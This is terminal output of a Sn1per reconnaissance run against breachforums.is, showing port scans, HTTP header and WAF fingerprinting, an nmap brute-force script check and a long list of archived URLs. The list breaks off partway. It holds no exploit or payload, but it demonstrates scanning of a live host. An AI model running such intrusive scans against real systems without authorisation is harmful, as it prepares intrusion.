└─# sniper -t https://breachforums.is
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/ [OK]
[*] Scanning breachforums.is [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[https://sn1persecurity.com
 + -- --=[Sn1per v9.2 by @xer0dayz                                                                                  
                                                                                                                    
====================================================================================•x[2023-09-17](20:12)x•
 GATHERING DNS INFO 
====================================================================================•x[2023-09-17](20:12)x•
====================================================================================•x[2023-09-17](20:12)x•
 CHECKING FOR SUBDOMAIN HIJACKING 
====================================================================================•x[2023-09-17](20:12)x•

====================================================================================•x[2023-09-17](20:12)x•
 PINGING HOST 
====================================================================================•x[2023-09-17](20:12)x•
PING breachforums.is (104.22.50.133) 56(84) bytes of data.
64 bytes from 104.22.50.133 (104.22.50.133): icmp_seq=1 ttl=55 time=48.4 ms

--- breachforums.is ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 48.350/48.350/48.350/0.000 ms

====================================================================================•x[2023-09-17](20:12)x•
 RUNNING TCP PORT SCAN 
====================================================================================•x[2023-09-17](20:12)x•
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 20:12 PDT
Nmap scan report for breachforums.is (104.22.51.133)
Host is up (0.043s latency).
Other addresses for breachforums.is (not scanned): 104.22.50.133 172.67.5.22 2606:4700:10::ac43:516 2606:4700:10::6816:3385 2606:4700:10::6816:3285
Not shown: 59 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
8080/tcp open  http-proxy
8443/tcp open  https-alt

Nmap done: 1 IP address (1 host up) scanned in 2.03 seconds

====================================================================================•x[2023-09-17](20:12)x•
 RUNNING INTRUSIVE SCANS 
====================================================================================•x[2023-09-17](20:12)x•
 + -- --=[Port 21 closed... skipping.
 + -- --=[Port 22 closed... skipping.
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 53 closed... skipping.
 + -- --=[Port 67 closed... skipping.
 + -- --=[Port 68 closed... skipping.
 + -- --=[Port 69 closed... skipping.
 + -- --=[Port 79 closed... skipping.
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 111 closed... skipping.
 + -- --=[Port 123 closed... skipping.
 + -- --=[Port 135 closed... skipping.
 + -- --=[Port 137 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 161 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 264 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 445 closed... skipping.
 + -- --=[Port 500 closed... skipping.
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 1099 closed... skipping.
 + -- --=[Port 1433 closed... skipping.
 + -- --=[Port 2049 closed... skipping.
 + -- --=[Port 2181 closed... skipping.
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3310 closed... skipping.
 + -- --=[Port 3128 closed... skipping.
 + -- --=[Port 3389 closed... skipping.
 + -- --=[Port 3632 closed... skipping.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5555 closed... skipping.
 + -- --=[Port 5800 closed... skipping.
 + -- --=[Port 5900 closed... skipping.
 + -- --=[Port 5984 closed... skipping.
 + -- --=[Port 6000 closed... skipping.
 + -- --=[Port 6667 closed... skipping.
 + -- --=[Port 7001 closed... skipping.
 + -- --=[Port 8000 closed... skipping.
 + -- --=[Port 8001 closed... skipping.
 + -- --=[Port 9495 closed... skipping.
 + -- --=[Port 10000 closed... skipping.
 + -- --=[Port 16992 closed... skipping.
 + -- --=[Port 27017 closed... skipping.
 + -- --=[Port 27018 closed... skipping.
 + -- --=[Port 27019 closed... skipping.
 + -- --=[Port 28017 closed... skipping.
 + -- --=[Port 49180 closed... skipping.
====================================================================================•x[2023-09-17](20:12)x•
 SCANNING ALL HTTP PORTS 
====================================================================================•x[2023-09-17](20:12)x•
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Loaded configuration file from /usr/share/sniper/sniper.conf [OK]
[*] Loaded configuration file from /root/.sniper.conf [OK]
[*] Saving loot to /usr/share/sniper/loot/workspace/https:--breachforums.is [OK]
[*] Scanning breachforums.is [OK]
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[https://sn1persecurity.com
 + -- --=[Sn1per v9.2 by @xer0dayz                                                                                  
                                                                                                                    
                                                                                                                    
               ;               ,                                                                                    
             ,;                 '.                                                                                  
            ;:                   :;                                                                                 
           ::                     ::                                                                                
           ::                     ::                                                                                
           ':                     :                                                                                 
            :.                    :                                                                                 
         ;' ::                   ::  '                                                                              
        .'  ';                   ;'  '.                                                                             
       ::    :;                 ;:    ::                                                                            
       ;      :;.             ,;:     ::                                                                            
       :;      :;:           ,;"      ::                                                                            
       ::.      ':;  ..,.;  ;:'     ,.;:                                                                            
        "'"...   '::,::::: ;:   .;.;""'                                                                             
            '"""....;:::::;,;.;"""                                                                                  
        .:::.....'"':::::::'",...;::::;.                                                                            
       ;:' '""'"";.,;:::::;.'""""""  ':;                                                                            
      ::'         ;::;:::;::..         :;                                                                           
     ::         ,;:::::::::::;:..       ::                                                                          
     ;'     ,;;:;::::::::::::::;";..    ':.                                                                         
    ::     ;:"  ::::::"""'::::::  ":     ::                                                                         
     :.    ::   ::::::;  :::::::   :     ;                                                                          
      ;    ::   :::::::  :::::::   :    ;                                                                           
       '   ::   ::::::....:::::'  ,:   '                                                                            
        '  ::    :::::::::::::"   ::                                                                                
           ::     ':::::::::"'    ::                                                                                
           ':       """""""'      ::                                                                                
            ::                   ;:                                                                                 
            ':;                 ;:"                                                                                 
    -hrr-     ';              ,;'                                                                                   
                "'           '"                                                                                     
                  ''''                                                                                              

====================================================================================•x[2023-09-17](20:12)x•
 RUNNING TCP PORT SCAN 
====================================================================================•x[2023-09-17](20:12)x•
 + -- --=[Port 80 opened... running tests...
====================================================================================•x[2023-09-17](20:12)x•
 CHECKING HTTP HEADERS AND METHODS 
====================================================================================•x[2023-09-17](20:12)x•
HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 03:12:28 GMT
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 18 Sep 2023 04:12:28 GMT
Location: https://breachforums.is/
Server: cloudflare
CF-RAY: 8086684efaf32f71-LAX

HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 03:12:28 GMT
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 18 Sep 2023 04:12:28 GMT
Location: https://breachforums.is/
Server: cloudflare
CF-RAY: 8086684fe9832b89-LAX

HTTP/2 403 
date: Mon, 18 Sep 2023 03:12:28 GMT
content-type: text/html
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 80866850fe0c7e83-LAX

====================================================================================•x[2023-09-17](20:12)x•
 DISPLAYING META GENERATOR TAGS 
====================================================================================•x[2023-09-17](20:12)x•
====================================================================================•x[2023-09-17](20:12)x•
 DISPLAYING COMMENTS 
====================================================================================•x[2023-09-17](20:12)x•
====================================================================================•x[2023-09-17](20:12)x•
 DISPLAYING SITE LINKS 
====================================================================================•x[2023-09-17](20:12)x•
====================================================================================•x[2023-09-17](20:12)x•
 CHECKING FOR WAF 
====================================================================================•x[2023-09-17](20:12)x•

                ______
               /      \                                                                                             
              (  W00f! )                                                                                            
               \  ____/                                                                                             
               ,,    __            404 Hack Not Found                                                               
           |`-.__   / /                      __     __                                                              
           /"  _/  /_/                       \ \   / /                                                              
          *===*    /                          \ \_/ /  405 Not Allowed                                              
         /     )__//                           \   /                                                                
    /|  /     /---`                        403 Forbidden                                                            
    \\/`   \ |                                 / _ \                                                                
    `\    /_\\_              502 Bad Gateway  / / \ \  500 Internal Error                                           
      `_____``-`                             /_/   \_\                                                              
                                                                                                                    
                        ~ WAFW00F : v2.2.0 ~                                                                        
        The Web Application Firewall Fingerprinting Toolkit                                                         
                                                                                                                    
[*] Checking http://breachforums.is
[+] The site http://breachforums.is is behind Cloudflare (Cloudflare Inc.) WAF.
[~] Number of requests: 2

====================================================================================•x[2023-09-17](20:12)x•
 GATHERING HTTP INFO 
====================================================================================•x[2023-09-17](20:12)x•
http://breachforums.is:80 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[cloudflare], IP[172.67.5.22], RedirectLocation[https://breachforums.is/], UncommonHeaders[cf-ray]
https://breachforums.is/ [403 Forbidden] Country[UNITED STATES][US], HTTPServer[cloudflare], IP[104.22.51.133], Title[403 Forbidden], UncommonHeaders[cf-cache-status,cf-ray]

====================================================================================•x[2023-09-17](20:12)x•
 GATHERING WEB FINGERPRINT 
====================================================================================•x[2023-09-17](20:12)x•
 onion-location: http://breachedu76kdyavc6szj6ppbplfqoz3pgrk3zw57my4vybgblpfeayd.onion
 CF-Cache-Status: DYNAMIC
 Server: cloudflare
 CF-RAY: 808668c27f042a8b-LAX
====================================================================================•x[2023-09-17](20:12)x•
 SAVING SCREENSHOTS 
====================================================================================•x[2023-09-17](20:12)x•
webscreenshot.py version 2.2.1

[+] 1 URLs to be screenshot
[+] 1 actual URLs screenshot
[+] 0 error(s)
====================================================================================•x[2023-09-17](20:13)x•
 RUNNING NMAP SCRIPTS 
====================================================================================•x[2023-09-17](20:13)x•
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 20:13 PDT
NSE: Loaded 51 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:13
Completed Parallel DNS resolution of 1 host. at 20:13, 0.01s elapsed
Initiating SYN Stealth Scan at 20:13
Scanning breachforums.is (104.22.51.133) [1 port]
Discovered open port 80/tcp on 104.22.51.133
Completed SYN Stealth Scan at 20:13, 0.07s elapsed (1 total ports)
Initiating Service scan at 20:13
Scanning 1 service on breachforums.is (104.22.51.133)
Completed Service scan at 20:13, 6.09s elapsed (1 service on 1 host)
NSE: Script scanning 104.22.51.133.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.86s elapsed
Initiating NSE at 20:13
Completed NSE at 20:13, 0.18s elapsed
Nmap scan report for breachforums.is (104.22.51.133)
Host is up (0.048s latency).
Other addresses for breachforums.is (not scanned): 104.22.50.133 172.67.5.22 2606:4700:10::ac43:516 2606:4700:10::6816:3385 2606:4700:10::6816:3285

PORT   STATE SERVICE VERSION
80/tcp open  http    Cloudflare http proxy
|_http-server-header: cloudflare
| http-brute:   
|_  Path "/" does not require authentication

NSE: Script Post-scanning.
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
Initiating NSE at 20:13
Completed NSE at 20:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.80 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
====================================================================================•x[2023-09-17](20:13)x•
 RUNNING PASSIVE WEB SPIDER 
====================================================================================•x[2023-09-17](20:13)x•
====================================================================================•x[2023-09-17](20:13)x•
 FETCHING WAYBACK MACHINE URLS 
====================================================================================•x[2023-09-17](20:13)x•
http://breachforums.is/
https://breachforums.is/.well-known/ai-plugin.json
https://breachforums.is/.well-known/assetlinks.json
https://breachforums.is/.well-known/dnt-policy.txt
https://breachforums.is/.well-known/gpc.json
https://breachforums.is/.well-known/nodeinfo
https://breachforums.is/.well-known/openid-configuration
https://breachforums.is/.well-known/security.txt
https://breachforums.is/.well-known/trust.txt
https://breachforums.is/?__cf_chl_tk=3WkbHpWJDB1ImnWz3hxOIxYQjFKmHksDosU7ECIyP5s-1692197194-0-gaNycGzNC1A
https://breachforums.is/ads.txt
https://breachforums.is/alerts.php?modal=1
https://breachforums.is/Announcement-Database-Index
https://breachforums.is/Announcement-Leak-Section-Rules
https://breachforums.is/Announcement-Marketplace-Section-Rules
https://breachforums.is/Announcement-Official-Forum-Middlemen-Services
https://breachforums.is/app-ads.txt
https://breachforums.is/attachment.php
https://breachforums.is/awards
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/bans
https://breachforums.is/cache/themes/theme1/latestposts.min.css
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/showthread.min.css
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/usercp.min.css
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/alerts.min.css
https://breachforums.is/cache/themes/theme3/alerts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/alerts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/all.min.min.css
https://breachforums.is/cache/themes/theme3/all.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/all.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/css3.min.css
https://breachforums.is/cache/themes/theme3/css3.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/css3.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/custom.min.css
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1690800105
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/ficons.min.css
https://breachforums.is/cache/themes/theme3/ficons.min.css?t=1687828213
https://breachforums.is/cache/themes/theme3/ficons.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/fork-awesome.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/global.min.css
https://breachforums.is/cache/themes/theme3/global.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/global.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/hovercards.min.css
https://breachforums.is/cache/themes/theme3/hovercards.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/hovercards.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/lib.min.min.css
https://breachforums.is/cache/themes/theme3/lib.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/lib.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/mobile.min.css
https://breachforums.is/cache/themes/theme3/mobile.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/mobile.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/modcp.min.css
https://breachforums.is/cache/themes/theme3/modcp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/plugins.min.css
https://breachforums.is/cache/themes/theme3/plugins.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/plugins.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/roboto.min.css
https://breachforums.is/cache/themes/theme3/roboto.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/roboto.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/star_ratings.min.css
https://breachforums.is/cache/themes/theme3/star_ratings.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/star_ratings.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/thread_status.min.css
https://breachforums.is/cache/themes/theme3/thread_status.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/thread_status.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/thread_status.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/thread_status.min.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1694000093
https://breachforums.is/canary.txt
https://breachforums.is/captcha.php
https://breachforums.is/captcha.php?imagehash=141828baf01d56225b0847031cab8d6d
https://breachforums.is/captcha.php?imagehash=2b38fa3ce7c1c1f3a1c0646eafbd970e
https://breachforums.is/captcha.php?imagehash=3edb31000c97cf726b1af2b57d7aaf6d
https://breachforums.is/captcha.php?imagehash=6650b3d1ec76dd823a0511a098dd3973
https://breachforums.is/captcha.php?imagehash=707eda7bcdc60820459f43d311992ce7
https://breachforums.is/captcha.php?imagehash=84b8c70b6e79a9cf6e01ee400285af71
https://breachforums.is/captcha.php?imagehash=94acb4d016fbc50d9b1301071b3d5a4f
https://breachforums.is/captcha.php?imagehash=9899e4817991021a9df5353240f04a31
https://breachforums.is/captcha.php?imagehash=98ed3e32a3d89af41f63167d01363475
https://breachforums.is/captcha.php?imagehash=b82e9751ef7f715508fc061289a732ba
https://breachforums.is/captcha.php?imagehash=cd820b48f182e82db10f31ed3f84be13
https://breachforums.is/captcha.php?imagehash=d65f4f7c5ba0aa3bd33ed05939d87477
https://breachforums.is/captcha.php?imagehash=daaed679cfc9e862dd0f699b189af904
https://breachforums.is/captcha.php?imagehash=dc489491f6460807cbf5724a911a7a42
https://breachforums.is/captcha.php?imagehash=e066c4c96a2f109716855a7a78f7b19e
https://breachforums.is/captcha.php?imagehash=ece183a7ec0640c2d741988b3cfaa66f
https://breachforums.is/captcha.php?imagehash=ef41a4ca2b053f78a2be922c5b6eebd7
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1022172274:1694941561:DFezosWkrAAP6CsADgEQUS8STOXYsjDJogNI_286vRU/808076f57dfa15ba/9a866b27871b44b
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1158509571:1692195799:1nGud-MBuu7NKai0lD6K3Bk7ElZ7MGqDopRxR1Yqdq8/7f7a7a221e4c2364/82218ff13cd6eac
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1184811243:1693292907:R1ztbnaqBBeAYCzWUrfK55FceOedzuyJ050_wXl2ZKU/7fe352cb990afa86/999b49a6090634c
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1307438287:1692195792:xqdCEAflJhAadPHqS4pentED3jW_7Uj5DmG5KHasPpg/7f7a7a59ed77ce84/d393701f2bddf33
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1391597927:1692195859:iJQm692-ObfWbQKgSRi4Dex8R4T4cCrQMxvc79qTcVc/7f7a7a947c67cf31/9ac6d77b267941a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1396288796:1694794031:pEm_pqVF9U6XiPQhIvONa_kUvbhUHUn-QfPRNIJs-vY/80728ca05f785c18/a392d7d237a9c29
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1409471175:1694797680:iLr9JakE4BOLKHHsVcb9k-u2JXaQMs3HVESiQ6dIOIU/80729406fd8f1703/44c2270bd6a357f
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1431726166:1694797741:c7P9YNYEwE78L3OMW6mbmySMz_nJpHsa3rvG90vVxck/807290c26a79f9f1/8ffb7cf3854eb6a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1526924672:1692195816:TvoI2h-zTs0Wzu_M__TdabMUukcwjrF6lfT2pA_73lU/7f7a79246b85985a/6d4235938453e0d
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1531445855:1690700772:4GdzAZ0lz_JTHdxvaANy0ytMNVDl_-Ncq-iZuPGF-wc/7eebe371eb3824fa/8679a1accb6d2eb
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1592424889:1694797767:D8zm1wF6v27xTRoLM6-1irTBa5aLQXUD1fyorxBqXvw/8072956aff732393/c4bb3724039c42a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1606251257:1694797799:egQs7MdFFPJHomzgBvqZsmbMQIGmeZ5EPUF5RqqRc08/80728ea30ece24dc/15fe7f60e654a7b
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1611212363:1690157277:Ya_o143n6cMFNNLMExaJ3hlRmadyNAdhXTdfUsYalik/7eb823147fa9158f/10a70f7f4735591
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1720806833:1690700857:nWNCQhDzetyvy0aUBCK3ynelt50arVj4r8prMnyHQw8/7eebe2f87c44cedd/7c345247ff7b8c4
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1720806833:1690700857:nWNCQhDzetyvy0aUBCK3ynelt50arVj4r8prMnyHQw8/7eebe33849962512/bd7f041bbfefab1
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1768021021:1692195867:TgC_to9fAnrTiOvCcgoBKALEQsA_kRl_VLQuo9VFa8w/7f7a79033e55983a/98124283b0f751b
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/1999398225:1690700735:b_DSlMycFu9ZxXYThaPD7mf3XHjOt_T44iIqWA5sC20/7eebe2c95dda1748/c4aa30e144363f7
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/216388804:1693292991:HCc38SRaUVXvWS5XGhQA9mLE5s3oNF0UUBcxP4mgG1Q/7fe3534a9e969644/4a367bc4ca2259a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/293236567:1693292934:uuPysJa-Vgo1UfIMHudjsAp_hiYwqq5nuz54Bowk6Ak/7fe352cc7dc9fa4e/a8c1cd6797ab939
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/324892410:1690700761:srCnJCkfWSLpP0Aqy0boyDVKPR35WfsZa8IsYG9B-nA/7eebe3d7ab619667/e713ed6f8d25d04
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/490982123:1690643359:mQFHYs0dUCsEg_LzVzptt2CnM5s-XJeQz1dfmO1JubM/7ee67e613ccacec1/577e56cbfc46764
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/534573019:1693026524:jGNRc_IxAUds-5lfT88_JSVhum1oONYlKlR9DqWU4-Y/7fc9a9595ad2159e/805c363111c4ab5
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/614259502:1693292965:7Atk7-xAIksTEuFpVfVtfDtNu-Ur086x2CYA8R3lcXM/7fe353496a76f93d/d241e909ac100d2
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/619123956:1690636137:Qq5rGO0FDW9Ras1gkh5IPe8yXFO4F8umh9orPvzKASU/7ee5b8440c22172a/62a26d56449664a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/619386773:1690157454:_AYkh7_T6_XS3jlD0Gtu0d4LggyW-5wH0842p2RtA9c/7eb81f6e69e8ce80/1edd1bf68406a24
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/642517850:1693292810:RVmTguXoHHGQ8VRLY-qojFJaPXJSbAbVf1He5hqten4/7fe35296faf6d01d/4af4c38bf32d4b8
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/649580181:1693292839:emmnCbbuLFfFKTktyFJIcdCHRswGKyFkmQ0ZjArv6mM/7fe352ca0e6b9645/e29e85d2b6a04d1
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/663482838:1692195767:KIGffnsT6oocrTpqIGDJCkJJvvQ33ODV4z856o54xgY/7f7a78c0dae3cf5d/320d932f4918c79
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/850481710:1693293010:kGhPBG2lcTkm2wHgtRS-yYVrhYjmNN4Y8G9uz7bAWGM/7fe352f48d11f9e0/e655317cd02c5eb
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/894559952:1692195871:qhCeNXCg6dw4fmvqnsagR0DBiTBOXs10krz1yzAFy7g/7f7a7a389f92f947/ce23a2dfad874a6
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/953019649:1693292954:8SxuW0XpN-EU4TPHbA7OESwZWaWWNzzXjnE1DjPu350/7fe3528eadf6fb38/956bfe7271f9dae
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/953019649:1693292954:8SxuW0XpN-EU4TPHbA7OESwZWaWWNzzXjnE1DjPu350/7fe352d1782e9831/a2d650ad9842581
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/993541467:1690157414:Oep7bfbaz4206uhif-9F8XiYOwFHX7QfMCchkX6pPUQ/7eb81f45edb41758/b80de602903a019
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee5b8440c22172a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee67e613ccacec1
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee67e7b6cff238b
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe2c95dda1748
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe2f87c44cedd
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe33849962512
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe371eb3824fa
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe3d7ab619667
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a78c0dae3cf5d
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a79033e55983a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a79246b85985a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a7a221e4c2364
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a7a389f92f947
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a7a59ed77ce84
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a7a947c67cf31
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fc9a9595ad2159e
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe3528eadf6fb38
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe35296faf6d01d
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352ca0e6b9645
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352cb990afa86
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352cc7dc9fa4e
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352d1782e9831
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352f48d11f9e0
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe353496a76f93d
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe3534a9e969644
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=80728ca05f785c18
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=80728ea30ece24dc
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=807290c26a79f9f1
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=80729406fd8f1703
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8072956aff732393
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=808076f57dfa15ba
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/jsch/v1?ray=7eb81f45edb41758
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/jsch/v1?ray=7eb81f6e69e8ce80
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/jsch/v1?ray=7eb823147fa9158f
